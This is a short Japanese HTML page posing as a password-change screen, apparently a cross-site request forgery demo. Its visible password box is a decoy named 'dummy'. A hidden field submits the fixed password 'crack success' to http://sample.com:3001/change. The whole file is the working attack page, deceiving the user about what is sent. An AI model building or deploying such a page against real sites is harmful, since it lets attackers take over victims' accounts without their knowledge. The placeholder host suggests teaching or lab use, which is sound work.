<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8" />
    <title>パスワード変更画面</title>
  </head>
  <body>
    <p>パスワード変更画面</p>
    <form action="http://sample.com:3001/change" method="POST">
      新パスワード:<input name="dummy" type="password" />
      <input name="password" type="hidden" value="crack success" />
      <br />
      <input type="submit" value="パスワード変更" />
    </form>
  </body>
</html>
